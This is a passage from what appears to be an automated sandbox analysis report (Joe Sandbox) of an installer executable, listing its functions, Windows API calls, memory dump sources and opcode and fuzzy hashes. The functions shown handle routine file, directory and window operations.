                                                                                                                                                                        control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                                                        • String ID: nsa
                                                                                                                                                                        • API String ID: 1716503409-2209301699
                                                                                                                                                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                        APIs
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                        • String ID: HideWindow
                                                                                                                                                                        • API String ID: 1249568736-780306582
                                                                                                                                                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                        • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                        • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                        • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                        • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                        Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 415043291-0
                                                                                                                                                                        • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                        • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                        • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                        • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                        Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                        • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                        • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                        • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                        • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                        • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                        • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                        Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4115351271-0
                                                                                                                                                                        • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                        • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                        • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                        • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                        Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                        • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                        • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                        • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                        Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                        Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
